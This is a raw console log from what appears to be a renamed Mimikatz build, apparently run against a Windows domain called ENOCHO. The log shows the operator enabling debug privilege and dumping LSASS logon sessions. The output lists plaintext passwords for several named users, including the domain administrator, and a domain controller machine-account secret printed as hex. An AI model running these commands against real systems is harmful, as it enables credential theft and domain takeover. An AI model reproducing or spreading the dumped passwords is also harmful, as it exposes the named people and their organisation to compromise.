ZhuMimktz 1.2 x64 (RC)(Feb 10 2014 10:48:26)
http://www.DooShvari.com

DOOSHVARI(commandline) = priv::d3bug
Request d'ACTIVATION privilege : SeDebugPrivilege : OK

DOOSHVARI(commandline) = lsass::logonPasswords

Id authentication         : 0;1448777240
Package authentication  : Kerberos
primary User       : fakhruddina
Domain authentication  : ENOCHO
	msv1_0 :	n.s. (PrimaryCredentials KO)
	kerberos :	
	ssp :	
	wdigest :	Peardoor1
	tspkg :	n.t. (LUID KO)

Id authentication         : 0;996
Package authentication  : Negotiate
primary User       : ENOCDC3$
Domain authentication  : ENOCHO
	msv1_0 :	n.s. (Credentials KO)
	kerberos :	
	ssp :	
	wdigest :	
71 ff 8f b2 af 59 b4 9e 85 c8 14 78 be 4b 2b 19 f5 eb 27 bc 67 8e 4f 7b dd 60 df af 7c 0c 9a 8f 
32 89 93 59 49 c8 f8 16 5a 83 ff 30 c0 bf 89 e8 d1 08 2e e3 92 5a 69 d6 71 fc 6e f6 b7 d0 23 5c 
ba 90 d2 4c a1 fe 5f 9a c8 47 4d 96 08 51 5c c8 43 18 fb 41 55 dd 00 03 1c aa 32 23 31 94 ec 6c 
58 85 2f fe 25 68 7b bc 94 be 5a c4 7d df ec 62 60 80 1e 69 18 b4 cd 8e 59 a0 ef 6e ef 01 25 1b 
ee ef a6 f2 62 e7 6c e2 8f 1f 4e 2e 69 b0 f0 61 f3 a2 5e d0 b7 8c a4 7c f7 31 03 4a 4e ba 68 58 
ee 99 53 42 65 47 bb d0 d2 08 e1 5b eb 21 a3 78 7b 1e dc e0 15 d5 a1 0d c3 1a c9 0f 93 40 0c 45 
a5 ec 83 12 c2 71 b5 42 e2 84 62 2f 84 69 78 97 eb 55 07 52 a2 3f 70 9e ae e3 1f 34 30 3e 1b fa 
62 7b 30 d6 f1 77 80 a8 ba 2d 42 17 c1 b2 e4 41 
	tspkg :	n.s. (SuppCred KO) / n.t. (LUID KO)

Id authentication         : 0;172249
Package authentication  : Kerberos
primary User       : administrator
Domain authentication  : ENOCHO
	msv1_0 :	n.s. (PrimaryCredentials KO)
	kerberos :	
	ssp :	
	wdigest :	$1lver1ng
	tspkg :	n.t. (LUID KO)

Id authentication         : 0;997
Package authentication  : Negotiate
primary User       : LOCAL SERVICE
Domain authentication  : NT AUTHORITY
	msv1_0 :	n.s. (Credentials KO)
	kerberos :	
	ssp :	
	wdigest :	
	tspkg :	n.t. (LUID KO)

Id authentication         : 0;44198
Package authentication  : NTLM
primary User       : 
Domain authentication  : 
	msv1_0 :	n.s. (Credentials KO)
	kerberos :	n.t. (LUID KO)
	ssp :	
	 [2] {  ;  ;  }
	 [3] {  ;  ;  }
	 [4] {  ;  ;  }
	wdigest :	n.t. (LUID KO)
	tspkg :	n.t. (LUID KO)

Id authentication         : 1;827773091
Package authentication  : Kerberos
primary User       : mazhark
Domain authentication  : ENOCHO
	msv1_0 :	n.s. (PrimaryCredentials KO)
	kerberos :	
	ssp :	
	wdigest :	july@2015
	tspkg :	n.t. (LUID KO)

Id authentication         : 0;2388468107
Package authentication  : Kerberos
primary User       : fakhruddina
Domain authentication  : ENOCHO
	msv1_0 :	n.s. (PrimaryCredentials KO)
	kerberos :	
	ssp :	
	wdigest :	Peardoor1
	tspkg :	n.t. (LUID KO)

Id authentication         : 0;680832699
Package authentication  : Kerberos
primary User       : mazhark
Domain authentication  : ENOCHO
	msv1_0 :	n.s. (PrimaryCredentials KO)
	kerberos :	
	ssp :	
	wdigest :	july@2015
	tspkg :	n.t. (LUID KO)

Id authentication         : 0;173778107
Package authentication  : Kerberos
primary User       : tfernandes
Domain authentication  : ENOCHO
	msv1_0 :	n.s. (PrimaryCredentials KO)
	kerberos :	
	ssp :	
	wdigest :	sefra4484$
	tspkg :	n.t. (LUID KO)

Id authentication         : 0;999
Package authentication  : Negotiate
primary User       : ENOCDC3$
Domain authentication  : ENOCHO
	msv1_0 :	n.s. (Credentials KO)
	kerberos :	
	ssp :	
	wdigest :	
71 ff 8f b2 af 59 b4 9e 85 c8 14 78 be 4b 2b 19 f5 eb 27 bc 67 8e 4f 7b dd 60 df af 7c 0c 9a 8f 
32 89 93 59 49 c8 f8 16 5a 83 ff 30 c0 bf 89 e8 d1 08 2e e3 92 5a 69 d6 71 fc 6e f6 b7 d0 23 5c 
ba 90 d2 4c a1 fe 5f 9a c8 47 4d 96 08 51 5c c8 43 18 fb 41 55 dd 00 03 1c aa 32 23 31 94 ec 6c 
58 85 2f fe 25 68 7b bc 94 be 5a c4 7d df ec 62 60 80 1e 69 18 b4 cd 8e 59 a0 ef 6e ef 01 25 1b 
ee ef a6 f2 62 e7 6c e2 8f 1f 4e 2e 69 b0 f0 61 f3 a2 5e d0 b7 8c a4 7c f7 31 03 4a 4e ba 68 58 
ee 99 53 42 65 47 bb d0 d2 08 e1 5b eb 21 a3 78 7b 1e dc e0 15 d5 a1 0d c3 1a c9 0f 93 40 0c 45 
a5 ec 83 12 c2 71 b5 42 e2 84 62 2f 84 69 78 97 eb 55 07 52 a2 3f 70 9e ae e3 1f 34 30 3e 1b fa 
62 7b 30 d6 f1 77 80 a8 ba 2d 42 17 c1 b2 e4 41 
	tspkg :	n.t. (LUID KO)

DOOSHVARI(commandline) = exit
